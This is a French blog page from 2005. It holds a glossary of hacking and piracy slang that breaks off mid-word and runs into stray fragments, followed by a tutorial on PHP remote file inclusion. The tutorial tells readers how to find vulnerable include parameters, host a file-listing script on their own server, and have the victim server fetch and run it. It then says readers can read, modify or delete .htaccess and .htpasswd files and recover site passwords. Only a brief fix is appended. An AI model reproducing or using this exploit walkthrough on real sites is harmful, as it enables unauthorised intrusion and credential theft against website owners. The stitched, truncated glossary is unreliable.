Overblog
Editer l'article Suivre ce blog Administration + Créer mon blog

compteur de visit


Appz :
Terme désignant des applications piratées, vient de l'association entre "apps" diminutif de "application" et de warez, il existe aussi "gamez", "ftpz", etc...

APP :
Agence pour la protection des programmes. Association offrant aux programmeurs la possibilité de protéger leurs oeuvres, leurs logiciels. Daniel Duthil est le créateur/responsable de l'agence depuis 1982. - Interview -

Abandonware :
C'est le fait qu'un éditeur de jeu vidéo décide de faire don d'un de ses plus vieux jeux. Il peu donc être téléchargé en toute légalité. Très souvent utilisé dans le petite monde de l'émulation de console de jeux.

Beta-testeur :
Personne qui teste des versions "Bêta" de logiciel, les version "Bêta" sont des versions avec toutes les fonctionnalités mais où la phase de test est inachevés. Le Bêta Test est la dernière étape avant la commercialisation ou la diffusion. Dans les versions "Bêta" seul les bugs sont corrigés, il n'y a pas de grosses modification qui sont apportées. Ils existent aussi les versions "Alpha" qui sont des versions non finalisées ou toutes les fonctionnalité ne sont pas apportées. Elles peuvent subir de grosses modifications et servent à tester les premières ébauches.

Blue box :
Moyen technique pour pirater les télécommunications. Utilise des fréquences numériques afin de détourner les commutateurs téléphoniques et donc de ne pas payer les communications.

Alerte :
Suite à un incident, les sociétés spécialisées publient une alerte afin d'avertir la communauté utilisant le système en danger, faillible au bugs qui a provoqué l'incident.

Black box :
C'est le moyen hardware du piratage des télécommunications. Un boîtier (noire) bourré d'électronique qui pouvait faire croire que votre ligne téléphonique était occupée ou simulait l'absence du décrochage de la ligne. Beaucoup de fantasme perdure sur le Web au sujet des box.

Black Hat Briefings :
Rassemblement de hackers se déroulant à New York en Juillet. Le BHB Précède le DEF CON de Las Vegas.

BCRCI :
Brigade centrale de la répression du crime informatique. Police spécialisée dans la lutte de la cyber criminalité en France.

Busted :
Terme désignant l'arrestation d'un pirate par la police. Il a été busté, il a été arrêté.

Big Brother :
Terme utilisé pour parler de la surveillance sur le web. Tiré du roman de George Orwell - 1984. Une fiction décrivant un monde totalitaire où les hommes vivent sous le regard et le contrôle quasi-mental de Big Brother.

Bios :
Basic Input/Output System - Il est le pilier central de votre ordinateur. Il se trouve directement sur votre carte mère. Il contrôle au démarrage votre machine, les périphériques, etc.

Bootleg :
Morceau de concert pris à l'insu des chanteurs. Cette copie pirate du concert s'arrache au prêt des collectionneurs.

Buffer Overflow :
Les logiciels se servent d'un buffer pour stocker en mémoire les données en cours de traitement. Si le pirate connaît l'adresse en mémoire vive, que l'on nomme RAM, de cette mémoire tampon, le buffer du logiciel, il peut provoquer un "buffer overflow" en dépassant sa capacité maximale de traitement. Les conséquences sont multiples : Plantages, fonctions altérées du programme, accessibilités vers des zones normalement réservées, ...

Brèche :
On appelle aussi trou de sécurité. Synonyme de vulnérabilité ou encore faille.

Brute force cracking :
Un système peut posséder une faille, mais il existe d'autres méthodes pour le pénétrer. L'une des ces méthodes se nomme brute force cracking. Cette attaque consiste à "casser" les codes de chiffrement. Pour cela il existe des logiciels, nommées brutes force.

Call :
Numéros de téléphones.

Calling-card :
C'est le principe des cartes de téléphoniques utilisant un abonnement. En France nous avons eu la carte pastel. 10 chiffres et un code secret. Le pirate téléphone ou il le souhaite sur le compte du vrai propriétaire de la carte. Cette technique a évolué avec l'apparition des cartes prépayées de type Kertel.

CCC :
Le Chaos computer club. Groupe de hacker mythique par excellence. Le CCC a été créé en Allemagne. Groupement légal depuis 1986. Son but, protéger les utilisateurs des abus de l'informatique. Son porte parole se nomme Andy Mueller-Maghun. Le CCC a eu à ses débuts quelques problèmes avec les services de contre espionnage allemande et français.

CERT (Computer Emergency Response Team) :
Centre d'étude et de recherche lié aux problèmes de sécurité informatique. Créé en décembre 1988 par la DARPA suite à la diffusion d'un virus qui bloquera, en novembre de la même année, 10 % des ordinateurs connectés au réseau.

Cult of dead cow :
Le cDc est un groupe de hacker connu pour avoir inventé le logiciel Back Orifice, un virus trojan.

Clipper :
Puce de cryptage lancée par l'administration Clinton afin de contrôler le net. Le logo anti-clipper représente un poing serrant deux éclairs.

Coder :
Son rôle, est tous ce qui touche au codage, à la programmation. Il peut casser des protections, créer des logiciels, des intros, démos (intro-maker / demomaker), le trainers-maker, etc.

Cracker :
Logiciel qui égraine des mots de passe jusqu'à ce qu'il en trouve un valide. Le plus connu de ces programmes se nomme crackjack. Un cracker désigne aussi un programmeur spécialisé dans le cassage de code, de mots de passes ou de protection de logiciels. un cracker utilise une world List.

Crasher :
Pirate dangereux. Il détruit pour le plaisir. Utilise des armes tel que des virus pour immobiliser sa cible. Il efface, casse, modifie par jeu ou sur commande. En gros c'est un "Hacker" du côté obscur de la force…

Crédit :
Représente la somme en Kilo-octets dont on dispose sur un Board pirate.

CNIL :
Commission Nationale de l'Informatique et des Libertés. Veille au respect des lois françaises concernant l'informatique, ainsi qu'à la légalité des fichiers nominatifs et de leur utilisation - application de la loi 78-19 de janvier 1978 relative à l'informatique, aux fichiers et aux libertés -

Cookie, cookies :
Les cookies sur le web sont des données au format texte. Ces données sont obtenues par le concepteur de la page web que vous consultez, soit parce qu'elles se réfèrent directement à ses pages ou au site, dans ce cas elles sont publiques et ne concernent pas particulièrement le lecteur, soit parce que le lecteur a complété et soumis un formulaire, et dans ce cas, elles se limitent aux entrées que le lecteur a bien voulu communiquer. Il y a deux façons de gérer les cookies: Soit en faisant appel au java script, soit au moyens de programmes CGI. Ils permettent de connaître vos habitudes sur la page Web, etc.

Cache :
Le répertoire cache est le lieu ou est répertoire et stocké toutes les pages Web et leurs éléments, que vous avez visités sur le net (fichier HTML, images, animations,...). Toutes ces informations sont stockées pour que l'affichage des pages soit plus rapide sur les sites déjà visités au moins une fois.

CSS :
Le CSS signifie Cross Site Scripting, à ne pas confondre avec le langage Cascade Style-Sheet. La vulnérabilité Cross Site Scripting affecte les sites web où il est possible d'entrer du texte dans des cases : Moteur de recherche, formulaires, forums, url, ... la faille fonctionne en insérant une ligne de code en langage Java Script, VBScript à la suite d'un url par exemple. Les serveurs non protégés interpentent le code et l'exécute. Les résultats sont nombreux, affichage d'un texte, vol de cookies, ...

DARPA :
Defense Advance Research Project Agency. Cette agence américaine dépend du secrétariat de la défense américaine. Ils sont à l'origine, entre autre, de l'ARPANET.

Demomaker :
Il est passé du bon coté de l'underground informatique. Il réalise des démos, intro (de crack...). Chez les demomakers ont y trouvent graphistes, musiciens, codeurs, etc. Une démo est une expression artistique informatique. Ils se réunissent dans des demos party (The Party, Volcanic party, etc...) où en un temps fixés doivent produire une démo.

Déplombe, déplombage, déplomber :
C'est le fait d'enlever une protection. Le déplomber est aussi appelé cracker.

Divx :
Programme permettant de compresser sons et images.

Désassembleur :
En fait c'est le fait de désassembler un programme. Pour cela on utilise un langage que l'on appel assembleur. Le mot est aussi utilisé dans le cas ou l'on souhaite mettre un logiciel sous forme de code. C, assembleur, cobol... Cela s'appelle aussi faire du "reverse engenering".

DoS :
Denial of Service. Le DoS est une attaque informatique qui consiste à envoyer des requêtes à un serveur afin de l'immobiliser, de le rendre inactif.. Le site n'est plus en mesure de répondre a toutes les requêtes, donc il n'est plus visible par les internautes. Le cas le plus connu reste les attaques à l'encontre de Yahoo, CNN en février 2000. La technique du Dos, Denial of Service est apparue en 1987. Cette technique de piratage consiste à mettre en fonction des "zombies" des machines piratées qui vont officier à l'insu de leurs propriétaires respectifs afin que ces machines envoient des millions de messages en direction des serveurs cibles ou des routeurs qui aiguillent le trafic. Inondées d'informations, de données, de requêtes, les cibles ne peuvent plus faire face, ralentissent ou tombent carrément en panne. En gros, vous avez votre téléphone, imaginez que toute la France vous appelle en même temps. Votre ligne sera saturée.

DoS, DDoS :
Un Denial of Service, en bon français ça donne un dénie de service correspond à une attaque qui a bout but de saturer un serveur, un site, afin que ce dernier ne puisse plus répondre. Les pirates inondent le serveur l'ordinateur cible. En recevant un flux trop important de données, celui-ci n'est plus capable de les gérer et plante. Un DDoS correspond à une attaque via plusieurs machines synchronisées entre elles. Elles envoient simultanément des données qui bloque le serveur ciblé. Le second D correspond à distribuer. Ce genre d'attaque permet soit de bloquer un serveur ou alors d'en faciliter l'intrusion.

Dongle :
Protection physique pour protéger un logiciel. Une sorte de clef a insérer dans un port de votre ordinateur afin que le logiciel protégé par ce dongle soit activé et utilisable.

DNS :
Les serveurs DNS sont indispensables. Véritables annuaires du web ils permettent de passer d'un IP à un une adresse Url compréhensible. De 204.***.**.** à elbossoso

D.S.T :
Direction de la Surveillance du Territoire. Service de contre-espionnage dépendant du ministère de l'intérieur. Le fantasme de tout pirate, se faire arrêter par la DST. Les Hackers les surnomment, les V.

DGSE :
Service de contre-espionnage, dépend de l'armée. S'occupe des affaires extérieures à la France.

Def Con :
Rassemblement de programmeurs, hackers, responsable sécurité qui se déroulent chaque année depuis 1992 à Las Vegas. Précédant le DEF CON à Las Vegas se déroule le Black Hat Briefings à New York.

DISSI :
Délégation Interministérielle pour la Sécurité des Systèmes d'Information.

Electro-Wizard :
Magicien de l'électronique. Tous ce qu'il touche se transforme en décodeur, black box et autres petites surprises électroniques.

Espiogiciel :
Dispositif logiciel capable de collecter des informations diverses concernant un internaute (adresse électronique, sites visités, logiciels possédés, etc.), puis de les diffuser - par le biais du réseau - jusqu'à son concepteur. L'intérêt et de connaître les habitudes de l'utilisateur, ses visites sur le Web, les logiciels qu'ils utilisent, etc.

Elite :
Désigne la "haute société" de la scène.

Empty site :
Site vide. Ne contient aucune news ou que des goodies.

Emulateur :
Logiciel permettant de simuler le fonctionnement d'une machine (et de ses logiciels) sur une autre machine. un émulateur de console de jeu par exemple ou d'un autre ordinateur.

Ezine :
Appelé aussi Fanzine. Petit magazine papier ou numérique écrit par des passionnés. Réalisé avec peu de moyen, sauf celui de la passion.

Eurodac :
Banque de données où sont stockées les empreintes digitales des demandeurs d'asile. Cet instrument étant destiné à empêcher que les requérants déposent leur demande dans plusieurs pays. Outil mis en place lors des accords de Schengen.

Exploit :
L'exploit est le fait de se servir d'une faille pour pirater, modifier ou détourner un système informatique de son fonctionnement normal. Le pirate va exploiter une vulnérabilité. Tous les piratages ne sont pas des exploits. Voir brute force.

Fake :
Fake veut dire blague ! On parle de Fake pour les photomontages ! Ou de fake pour les programmes qui en contiennent n autre.

FAI :
Fournisseur d'Accés à Internet.

Firewalls (porte coupe feu) :
Filtre entre plusieurs machines. Sert à protéger un réseau d'éventuelle attaque extérieur. Filtre et contrôle les accès.

Fanzine :
Appelé aussi Ezine. Petit magazine papier ou numérique écrit par des passionnés. Réalisé avec peu de moyen, sauf celui de la passion.

Faille :
On appelle aussi trou de sécurité. Synonyme de vulnérabilité ou encore brèche.

Gamez ou Goodies :
Vieux programmes, Appz

Générateur :
Programme permettant de générer des numéros de cartes bancaires, de téléphones, de mot de passe, etc.

Godfrain :
La Loi Godfrain , votée le 5 janvier 1988. Cette Loi relative à la fraude informatique a créé des infractions spécifiques en la matière, reprises par les articles 323-1 à 323-7 du nouveau Code Pénal institué par la Loi du 22 juillet 1992 entrée en vigueur le 1er mars 1994.

Hacker :
C'est avant tout un mec doué en informatique. Bidouilleurs et curieux, le hacker n'a qu'un seul but, faire évoluer ses connaissances et celles des autres. Le contraire d'un hacker c'est le crasher qui lui est mauvais !

Hijacking :
L'Hijacking est aussi appelé Ip Splicing. Cette technique de piratage est une action sur une session active établie est interceptée par un utilisateur non autorisé. Les pirates peuvent agir une fois qu'il y a eu identification, le pirate pouvant ainsi se faire passer pour un utilisateur autorisé. Ce genre d'attaque remplace de plus en plus le sniffing, ou le casse de password. Plus clairement, une machine A envoie des infos à B. Ses informations sont divisées en plusieurs paquets qui sont reconnues à l'aide des numéros de séquence et d'acquittement pour assurer le bon ordre et les acceptations. Si le pirate envoie des données ressemblant à celle de la machine A, B les valides, et le pirate a réussi à tromper B.

Hexagone :
La protection hexagone existe depuis le cpc. Elle protège donc un logiciel en 5 phases. Si on en oublie une, les 4 autres réparent la sécurité manquante.

HIP :
Hacking in Progress. Rassemblement de hackers. C'est le Woodstock informatique. Ca se passe en Hollande. Conférences, testes, et concours autours du Hacking y sont organisés.

Hoax :
Un hoax est un canular, une fausse nouvelle qui se propage la plupart du temps par e-mail. Il existe aussi des hoax par fax. L'idée est de faire diffuser une fausse information afin que les lecteurs la diffusent eux aussi.

Intro-makers :
Réalise des intro qu'il place au lancement d'un logiciel craqué. L'intro-maker devient très vite Demomaker. Même plaisir de création, mais cette fois légalement.

Icann :
Internet Corporation for Assigned Names and Numbers. Organisme mondial charge de gérer les noms de domaines sur Internet. .com, .org, .net .fr .be .ch. etc...

Incident :
L'incident apparaît quand une attaque a été constatée. Il est souvent trop tard pour le serveur qui a subit l'incident. Mais l'alerte va permettre de protéger les autres systèmes.

IP :
Internet Protocol. Standard utilisé pour l'adressage de données sur internet. Chaque ordinateur est connecté à une adresse IP qui lui est propre.

ISO, ISOZ :
Désigne des copies de CdRoms complets. En opposition au RIPS qui lui vient du format ISO des logiciel de gravure. On appelle ces copies téléchargeable, des "images de CD".

IRC :
Internet Relay Chat. Outil de communication en temps réel. IRC a été conçu par le finlandais Jarkko Oikarinen en 1988. Il a participé notamment au RFC1459. IRC est basé sur l'utilitaire "talk" sur système Unix. Les serveurs IRC Undernet sont maintenant codés par Run.

Icann :
Internet Corporation for Assigned Names and Numbers. Organisme mondial charge de gérer les noms de domaines sur Internet. .com, .org, .net .fr .be .ch. etc...

Intrusion :
Comme son nom l'indique s'est le fait de s'introduire dans un système. C'est l'un des objectifs possibles d'une attaque. Parmi les autres formes d'attaques : Le détournement, la modification, la mise hors service.

In the wild :
Un virus "In the wild" signifie que le virus s'est répandu.

Lame, Lamer, Lamerz :
Le lamer pompe tous ce qu'il trouve. Sur le net, tout le monde traite tout le monde de lamer. Il est synonyme de débutant. Le lamer est surtout quelqu'un qui se vante de faire partie de l'Elite.

Leech, leetch, leecher :
Crédits d'accès à un BBS, c'est aussi le fait de venir chercher quelque chose sur un Board. C'est aussi le fait de venir chercher quelque chose sur un Board. Désigne aussi la pratique d'un utilisateur sur un site qui prend tout et ne laisse rien, vient de l'anglais "leech"= "sangsue".

Loaded site :
BBS ou Site à visiter d'urgence. Contient beaucoup de news à télécharger.

Login :
C'est le nom d'un utilisateur.

Lag :
Temps que prend un message sur le web. Les donnés numériques que vous envoyez mettent plus ou moins de temps à parvenir à votre destinataire. Ce délai est appelé lag.

Macro Virus :
Un virus qui utilise les macros-commandes proposés dans les logiciels de bureautique de Microsoft - Word, Excel, Powerpoint, ... - Ces macros peuvent être inclus dans les fichiers .doc, .xls, ... Le macro virus va utiliser une commande pour détruire, par exemple, le contenu d'un document écrit sous Word.

News :
Nouveautés. Logiciels qui viennent tout juste de sortir sur un Board.

Nuke, nuker :
Dos attack utilisant le même procédé de que le DoS mais à une taille moindre. Vise surtout les canaux IRC.

Newbie :
Tiré de "New business". C'est le débutant, celui qui débute dans l'informatique. A ne pas confondre avec lamer.

Oldiez, Oldies :
Synonyme de Fake. Vieux programmes ou jeux, généralement plus d'un an par rapport à la sortie aux USA.

Overclocker, overcloking :
C'est le fait de "booster" votre machine. Lui donner un peu plus de puissance via des manipulation rarement catholique du genre mettre une mine de crayon dans un trou de votre carte m&e

Logisiel

dictionaire de mi

11 novembre 2005 5 11 /11 /novembre /2005 00:00
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
Faille d'include

Si tu pouvais utiliser du PHP librement sur un site, tu pourrais le hacker et en faire ce que tu veux.
Et pour certains sites, c'est possible !
Si tu vois que l'adresse d'une page d'un site est du genre http://www.site.com/page.php?page=news.php par exemple (ou http://www.site.com/?url=news.php ...etc), ça signifie que la page index inclu la page news.php pour l'afficher. Certain webmasters ont oublié de protégé cet include, ce qui fait que tu peux inclure n'importe quelle page !

Pour en être sûr, essai ça : http://www.site.com/page.php?page=http://www.google.com (ne pas oublier le http://)
Si la page d'accueil de google s'affiche dans le site, c'est que tu as réussi !


Maintenant, tu peux modifier les fichiers, en créer, récupérer des mots de passe du site en question !

Pour afficher tous les noms de fichiers du site (très utile pour savoir où se trouve l'admin...etc), créé un fichier avec le code php sur ton compte (voir tutoriaux php) :

<?
function scann($rep){
$dir=opendir($rep);
while($file=readdir($dir)){
if(is_dir("$rep/$file") && $file!="." && $file!=".."){
scann("$rep/$file");
}else{
echo "$rep/$file<br>";
}
}
}
scann(".");
?>


une fois ce script sur ton compte (http://www.toncompte.com/hack.txt), tu peux le faire exécuter par le serveur victime comme ceci :
http://www.site.com/page.php?page=http://www.toncompte.com/hack.txt
/! Ton fichier ne doit pas être en *.php, comme le disent la plupart des sites, sinon il sera exécuté sur ton serveur avant d'être affiché par le serveur victime, ce qui reviendrait à pirater ton site !
Et voilà ! Les noms de tous les fichiers du site www.site.com son affichés sur ton écran !


Maintenant que tu connais toutes les pages, les .htaccess et les .htpasswd, tu peux les voir, les effacer et les modifier de la même façon (voir les tutoriaux PHP).



Pour réparer la faille
Pour réparer la faille, il suffit de vérifier le nom de la page avant de l'include
Exemple de protection :
<?
$pages=Array("news.php","forum.php","livredor.php"); // Noms des pages autorisées à être incluses
// Si le nom de la page demandée fait partie de la liste des pages autorisées, on l'inclu :
if(in_array($page,$pages)) include $page;
?>
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
Partager cet article
Repost0

commentaires

N
Héhé cool :)\r\rArticle comme blog pas mal\r\rforum de discussion\r\r @ tres bientot !
Répondre

Articles RÉCents

Liens